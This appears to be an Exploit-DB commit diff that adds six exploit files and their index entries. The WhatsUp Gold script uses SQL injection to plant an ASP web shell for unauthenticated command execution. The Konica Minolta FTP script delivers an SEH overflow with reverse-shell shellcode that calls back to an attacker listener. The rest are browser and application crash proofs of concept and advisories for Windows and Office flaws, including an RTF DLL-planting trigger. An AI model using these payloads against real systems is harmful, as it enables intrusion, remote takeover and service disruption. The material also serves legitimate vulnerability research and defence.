DB: 2016-01-14

6 new exploits
2016-01-14 05:02:54 +00:00 · 2016-01-14 05:02:54 +00:00 · 477deae72e
commit 477deae72e
parent cecdd9a527
7 changed files with 276 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -35396,10 +35396,12 @@ id,file,description,date,author,platform,type,port
 39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
 39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
 39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
+39144,platforms/windows/dos/39144.html,"Internet Explorer 11.0.9600.18124 EdUtil::GetCommonAncestorElement - Denial of Service",2015-12-31,"Marcin Ressel",windows,dos,0
 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
 39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
+39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash PoC",2016-01-12,"Daniel Velazquez",windows,dos,0
 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
@ -35463,6 +35465,7 @@ id,file,description,date,author,platform,type,port
 39212,platforms/php/webapps/39212.txt,"WordPress JW Player for Flash & HTML5 Video Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
 39213,platforms/php/webapps/39213.txt,"WordPress Featured Comments Plugin Cross Site Request Forgery Vulnerability",2014-06-10,"Tom Adams",php,webapps,0
 39214,platforms/linux/local/39214.c,"Linux Kernel <= 3.3.5 '/drivers/media/media-device.c' Local Information Disclosure Vulnerability",2014-05-28,"Salva Peiro",linux,local,0
+39215,platforms/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command SEH Overflow",2016-01-11,TOMIWA,windows,remote,21
 39216,platforms/windows/dos/39216.py,"KeePass Password Safe Classic 1.29 - Crash PoC",2016-01-11,"Mohammad Reza Espargham",windows,dos,0
 39217,platforms/linux/local/39217.c,"Amanda <= 3.3.1 - Local Root Exploit",2016-01-11,"Hacker Fantastic",linux,local,0
 39218,platforms/windows/remote/39218.html,"TrendMicro node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote,0
@ -35474,3 +35477,6 @@ id,file,description,date,author,platform,type,port
 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
 39230,platforms/linux/local/39230.c,"Linux Kernel overlayfs - Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
+39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
+39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
+39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0
--- a/platforms/asp/webapps/39231.py
+++ b/platforms/asp/webapps/39231.py
@ -0,0 +1,42 @@
+#
+# Exploit Title: WhatsUp Gold v16.3 Unauthenticated Remote Code Execution
+# Date: 2016-01-13
+# Exploit Author: Matt Buzanowski
+# Vendor Homepage: http://www.ipswitch.com/
+# Version: 16.3.x
+# Tested on: Windows 7 x86
+# CVE : CVE-2015-8261
+# Usage: python DroneDeleteOldMeasurements.py <target ip>
+
+import requests
+import sys
+
+ip_addr = sys.argv[1]
+
+shell = '''<![CDATA[<% response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall() %>]]>'''
+
+sqli_str = '''stuff'; END TRANSACTION; ATTACH DATABASE 'C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\HTML\\NmConsole\\shell.asp' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES ('%s');--''' % shell
+
+session = requests.Session()
+
+headers = {"SOAPAction":"\"http://iDrone.alertfox.com/DroneDeleteOldMeasurements\"","User-Agent":"Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.4927)","Expect":"100-continue","Content-Type":"text/xml; charset=utf-8","Connection":"Keep-Alive"}
+
+body = """<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+  <soap:Body>
+    <DroneDeleteOldMeasurements xmlns="http://iDrone.alertfox.com/">
+      <serializedDeleteOldMeasurementsRequest><?xml version="1.0" encoding="utf-16"?>
+        <DeleteOldMeasurementsRequest xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+        <authorizationString>0123456789</authorizationString>
+        <maxAgeInMinutes>1</maxAgeInMinutes>
+        <iDroneName>%s</iDroneName>
+        </DeleteOldMeasurementsRequest></serializedDeleteOldMeasurementsRequest>
+    </DroneDeleteOldMeasurements>
+  </soap:Body>
+</soap:Envelope>""" % sqli_str
+
+response = session.post("http://%s/iDrone/iDroneComAPI.asmx" % ip_addr,data=body,headers=headers)
+print "Status code:", response.status_code
+print "Response body:", response.content
+
+print "\n\nSUCCESS!!! Browse to http://%s/NmConsole/shell.asp?cmd=whoami for unauthenticated RCE.\n\n" % ip_addr
--- a/platforms/windows/dos/39144.html
+++ b/platforms/windows/dos/39144.html
@ -0,0 +1,35 @@
+<!doctype html>
+<html>
+	<head>
+		<meta http-equiv='Cache-Control' content='no-cache'/>
+		<title>EdUtil::GetCommonAncestorElement Remote Crash</title>
+		<script>
+      /*
+      * Title : IE11 EdUtil::GetCommonAncestorElement Remote Crash
+      * Date : 31.12.2015
+      * Author : Marcin Ressel (https://twitter.com/m_ressel)
+      * Vendor Hompage : www.microsoft.com
+      * Software Link : n/a
+      * Version : 11.0.9600.18124
+      * Tested on: Windows 7 x64
+      */
+         		
+      var trg,src,arg;
+      var range,select,observer;
+			function testcase()
+			{
+			  document.body.innerHTML ='<table><colgroup></colgroup><table><tbody><table><table></table><col></col></table></tbody></table></table><select><option>0]. option</option><option>1]. option</option></select><ul type="circle"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>';
+		    var all = document.getElementsByTagName("*"); 
+			  trg = all[9];
+			  src = all[2]; 
+				arg = all[12];
+	      select = document.getSelection(); 
+			  observer = new MutationObserver(new Function("","range = select.getRangeAt(258);")); 
+				select.selectAllChildren(document);
+			  document.execCommand("selectAll",false,'<ul type="square"><li>0]. li</li><li>1]. li</li><li>2]. li</li><li>3]. li</li><li>4]. li</li><li>5]. li</li><li>6]. li</li></ul><select><option>0]. option</option><option>1]. option</option><option>2]. option</option><option>3]. option</option><option>4]. option</option><option>5]. option</option><option>6]. option</option><option>7]. option</option></select>');	
+			}
+		</script>
+	</head>
+	<body onload='testcase();'>	
+	</body>
+</html>
--- a/platforms/windows/dos/39226.py
+++ b/platforms/windows/dos/39226.py
@ -0,0 +1,27 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+# Exploit Title     : SNScan v1.05 Scan Hostname/IP Field Buffer Overflow Crash PoC
+# Discovery by      : Daniel Velazquez
+# Email         : ingenierovelazquez@hotmail.com
+# Discovery Date    : 12/01/2016
+# Vendor Homepage   : http://www.foundstone.com
+# Software Link     : http://www.mcafee.com/us/downloads/free-tools/snscan.aspx
+# Tested Version    : 1.05
+# Vulnerability Type    : Denial of Service (DoS) Local
+# Tested on OS      : Windows 8 x86 es
+# Steps to Produce the Crash: 
+# 1.- Run python code : python SNScan-v1.05.py
+# 2.- Open SNScan-v1.05.txt and copy content to clipboard
+# 3.- Open SNScan.exe
+# 4.- Clic button Ok
+# 5.- Paste Clipboard Scan > Hostname/IP
+# 6.- Clic on add button (->)
+# 7.- Clic button Aceptar
+# 8.- Crashed
+ 
+buffer = "\x41" * 388
+eip = "\x42" * 4
+ 
+f = open ("SNScan-v1.05.txt", "w")
+f.write(buffer + eip)
+f.close()
--- a/platforms/windows/dos/39232.txt
+++ b/platforms/windows/dos/39232.txt
@ -0,0 +1,48 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=594
+
+Heap corruption buffer underflow in devenum.dll!DeviceMoniker::Load()
+
+There exists a buffer underflow vulnerability in devenum.dll!DeviceMoniker::Load when attempting to null terminate a user supplied string. The function as it exists on Windows 7 x86 is implemented as follows:
+
+signed int __stdcall CDeviceMoniker::Load(CDeviceMoniker *this, struct IStream *a2)
+{
+  struct IStream *v2; // esi@1
+  signed int v3; // edi@1
+  const unsigned __int16 *v4; // ebx@2
+  char v6; // [sp+8h] [bp-4h]@1
+
+  v2 = a2;
+  v3 = a2->lpVtbl->Read(a2, &a2, 4, (ULONG *)&v6); // read a 4 byte user controlled length
+  if ( v3 >= 0 )
+  {
+    v4 = (const unsigned __int16 *)operator new[]((unsigned int)a2); // allocate length
+    if ( v4 )
+    {
+      v3 = v2->lpVtbl->Read(v2, (void *)v4, (ULONG)a2, (ULONG *)&v6); // read data into new buffer
+      if ( v3 >= 0 )
+      {
+        v4[((unsigned int)a2 >> 1) - 1] = 0; // BAD BAD BAD 
+        v3 = CDeviceMoniker::Init(this, v4);
+      }
+      operator delete[]((void *)v4);
+    }
+    else
+    {
+      v3 = -2147024882;
+    }
+  }
+  return v3;
+}
+
+The issue comes in when we specify a length of 1 with the first read. A buffer of length 1 will be allocated and 1 byte will be read into it. But, when the code goes to NULL terminate this buffer it divides the length by 2 and subtracts 2 (v4 is a wchar_t) leading to "\x00\x00" being written 2 bytes before the allocated buffer.
+
+This object "device.1" or {4315D437-5B8C-11D0-BD3B-00A0C911CE86} is reachable from any bit of software that performs an IPersistStream::Load on an arbritrary object. This vulnerable object is also reachable from any bit of software performing an OleLoad(IID_IOleObject) call with an with an attacker controlled CLSID -- as is the case in Office.
+
+In the attached Word Document PoC the OLE object StdObjLink or {00000300-0000-0000-c000-000000000046} is embedded with data pointing to the device.1 object. The StdObjLink supports IOleObject and IPersistStorage interfaces. When a user single clicks the object in the document an OleLoad call will load the StdObjLink object and call its IPersistStorage::Load (ole32!CDefLink::Load()) method. StdObjLink will then read the device.1 CLSID from the \x01Ole stream and call OleLoadFromStream with an interface ID of IMoniker. This call will then result in device.1 being loaded and the IPersistStream::Load() (devenum!DeviceMoniker::Load()) method being called.
+
+The DeviceMoniker::Load() method should limit the user supplied size to sane values that are 2 byte aligned.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39232.zip
+
--- a/platforms/windows/dos/39233.txt
+++ b/platforms/windows/dos/39233.txt
@ -0,0 +1,50 @@
+Source: https://code.google.com/p/google-security-research/issues/detail?id=555
+
+It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. The attached POC document "planted-mfplat.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {62dc1a93-ae24-464c-a43e-452f824c4250} (formatted as pack(">IHHBBBBBBBB")) which is one of several registered objects that have an InProcServer32 of WMALFXGFXDSP.dll. Other options include: 
+
+{637c490d-eee3-4c0a-973f-371958802da2}
+{874131cb-4ecc-443b-8948-746b89595d20}
+{96749377-3391-11D2-9EE3-00C04F797396}
+
+When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to wmalfxgfxdsp!DllGetClassObject() which does a LoadLibraryW() call for "mfplat". If the attached mfplat.dll is placed in the same directory with the planted-mfplat.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word.
+
+Here is the call stack leading up to the vulnerable LoadLibraryW() call:
+
+0:000> kb 
+ChildEBP RetAddr  Args to Child              
+002c8d18 68f02e2f 68f02e70 68f013bc 003f0774 kernel32!LoadLibraryW
+002c8d28 68f01ff4 00000000 002c93f4 003ff174 WMALFXGFXDSP!InitAVRTAlloc+0x58
+002c8d3c 7660aec6 003f0764 00000000 002c8de4 WMALFXGFXDSP!DllGetClassObject+0x87
+002c8d58 765e91cd 003f0764 7660ee84 002c8de4 ole32!CClassCache::CDllPathEntry::DllGetClassObject+0x30 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3324]
+002c8d70 765e8e92 002c8d84 7660ee84 002c8de4 ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+0x1f [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3831]
+002c8da8 765e8c37 002c8dec 00000000 002c93f4 ole32!CClassCache::GetClassObject+0x49 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 4582]
+002c8e24 76603170 76706444 00000000 002c93f4 ole32!CServerContextActivator::CreateInstance+0x110 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 974]
+002c8e64 765e8daa 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
+002c8eb8 765e8d1f 7670646c 00000000 002c93f4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
+002c8ed8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
+002c8ef8 765e8a53 76706494 002c9250 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
+002c8f34 765e8e0d 76706494 002c9250 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
+002c8f5c 76603170 76706494 00000000 002c93f4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
+002c8f9c 76602ef4 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
+002c91fc 76603170 76706448 00000000 002c93f4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
+002c923c 76603098 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
+002c9a10 76609e25 002c9b2c 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
+002c9a70 76609d86 002c9b2c 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
+002c9a94 76609d3f 002c9b2c 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
+002c9ac4 7662154c 002c9b2c 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
+002c9b40 7661f2af 62dc1a93 464cae24 2f453ea4 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
+002c9ba4 7661f1d4 06370820 00000000 5f3363a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
+002c9bcc 611483bf 06370820 5f3363a8 045d86e0 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
+WARNING: Stack unwind information not available. Following frames may be wrong.
+002c9c40 5f7c3973 06370820 5f3363a8 045d86e0 mso!Ordinal2023+0x7c
+002c9c8c 5f7c3881 036fe800 06370820 5f3363a8 wwlib!DllGetLCID+0x46e24d
+
+
+This DLL load can be triggered without user interaction with the following RTF document:
+
+{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7b62dc1a93-ae24-464c-a43e-452f824c4250\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39233.zip
+
--- a/platforms/windows/remote/39215.py
+++ b/platforms/windows/remote/39215.py
@ -0,0 +1,68 @@
+# Title: Konica Minolta FTP Utility 1.00 Post Auth CWD Command SEH Overflow.
+# Date : 01/08/2016
+# Author: TOMIWA.
+# Software link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
+# Software: Konica Minolta FTP Utility v1.0
+# Tested: Windows 7 SP1 64bits
+# Listen for a reverse netcat connection on port 4444
+# root@kali:~# nc -nlvp 4444
+# listening on [any] 4444 ...
+# connect to [192.168.0.11] from (UNKNOWN) [192.168.0.109] 49158
+# Microsoft Windows [Version 6.1.7601]
+# Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+# C:\Program Files (x86)\KONICA MINOLTA\FTP Utility>
+
+
+#!/usr/bin/python
+import socket
+
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+#buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2B"
+#msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.118 LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python
+buf =  ""
+buf += "\xbe\x95\x8c\xbb\x24\xdb\xdb\xd9\x74\x24\xf4\x5a\x29"
+buf += "\xc9\xb1\x5f\x31\x72\x14\x83\xc2\x04\x03\x72\x10\x77"
+buf += "\x79\x62\xe1\xae\xf6\xb1\x1e\xed\x1e\xe6\x8d\x3f\xba"
+buf += "\x32\xfb\x8e\x64\x74\x90\xea\x97\x1d\x7c\x89\x73\x1d"
+buf += "\x62\x91\x66\xa8\x21\x9a\xb7\xf6\xc8\xce\xd3\x8e\x8f"
+buf += "\x12\xa5\xc1\x62\x44\xeb\x33\x84\x55\x7e\xa1\xae\xc1"
+buf += "\x73\x50\xb4\xc6\xeb\x8a\x28\x66\x13\x8b\x8b\x42\x6d"
+buf += "\x5b\xa6\x63\x02\xbe\x7b\x71\xf0\xcd\x6e\x36\x8c\x69"
+buf += "\x3a\x7b\xc8\x03\xc7\xcf\xbe\x12\x0e\xf3\x7a\x29\xa7"
+buf += "\xe3\xb3\x54\xd3\x12\xd7\x99\x2c\x7e\x63\x6d\x08\x79"
+buf += "\x20\x29\x59\xf2\xfe\xe0\x1f\x9e\x6b\xa6\x36\x5a\x75"
+buf += "\x15\xd8\x5d\x8b\x65\xdb\xad\x7c\x84\xe8\x17\xac\x07"
+buf += "\xef\x45\x18\x29\x06\xbe\x07\x65\x68\xd5\xf9\xcb\x15"
+buf += "\x56\x13\x25\xa3\x72\xd0\xd7\x57\x77\xbb\x8f\x4d\x17"
+buf += "\xaf\xf9\x77\x53\x17\xf5\xeb\xab\xe0\x11\x1f\x88\xea"
+buf += "\xab\xa9\xce\x0b\x8d\x84\x8f\x76\x05\x05\xdc\x04\x0c"
+buf += "\x16\xc9\x84\x06\x6f\x2d\x02\x61\x59\xcd\x36\x17\x88"
+buf += "\xe9\x3a\x4f\x63\x9e\x61\x24\xbf\xdc\xd9\x53\x42\x1a"
+buf += "\xdf\xb2\x6e\xfe\xec\x8c\xf5\x6d\xeb\x74\x89\x29\x11"
+buf += "\x1f\x4d\x9c\xc4\x64\xb9\x8c\x54\xa3\x2c\x3f\xf4\x98"
+buf += "\x42\x11\xe0\x06\x32\x57\x75\xac\xaa\xec\x10\xda\x6d"
+buf += "\x20\x51\x57\xdd\x99\x1f\x35\x90\x23\xb6\xdb\x37\x17"
+buf += "\x1f\x1b\xea\xd1\x37\xc0\x88\x74\x4e\x74\xcf\x63\xb0"
+buf += "\x4f\xdc\x2c\x90\xe2\x08\xcd\x49\x40\x36\x1a\xfb\x18"
+buf += "\x29\x2b\x6f\x2e\x3c\x57\x6a\x79\xa8\xac\x49\xbe\xe7"
+buf += "\x2e\x48\xa0\xeb\x4f\x36\x3b\xa2\x40\xff\x9f\x21\xcd"
+buf += "\x8e\xb3\xdf\x92\xed\x3f\x12\x81\x1a\xba\x02\x20\x8f"
+buf += "\x1d\x5a\xef\xb1\xc3\xb0\x90\xed\x6a\x21\x5b\xc6\xb9"
+buf += "\x24\x3f\xa0\x3f\xc8\x4f\x05\xa3\xcf\x06\xa4\x06\xd5"
+buf += "\x8e\xd7\x3e\x11\xc4\x8c\x12\xa7\x3b\x75\x3f\xe8\xd3"
+buf += "\xd7\x08\x39\x83\xfa\x80\x71\x3c\x6e\x29\x8d\x5e\xcc"
+buf += "\xa1\xd4"
+#nSEH = "\xEB\x13\x90\x90"
+#SEH = "\x9D\x6D\x20\x12" >> 12206D9D
+buffer = "\x41" * 1037 + "\xeb\x0a\x90\x90" + "\x9D\x6D\x20\x12" + "\x90" *30 +  buf +  "D"*1955 
+#buffer = "\x41" * 1060
+print "\sending evil buffer...."
+s.connect(('192.168.0.109',21)) #HARDCODED IP ADDRESS.
+data = s.recv(1024)
+s.send('USER anonymous' + '\r\n')
+data = s.recv(1024)
+s.send('PASS anonymous' + '\r\n')
+data = s.recv(1024)
+s.send('CWD ' +buffer+'\r\n')
+s.close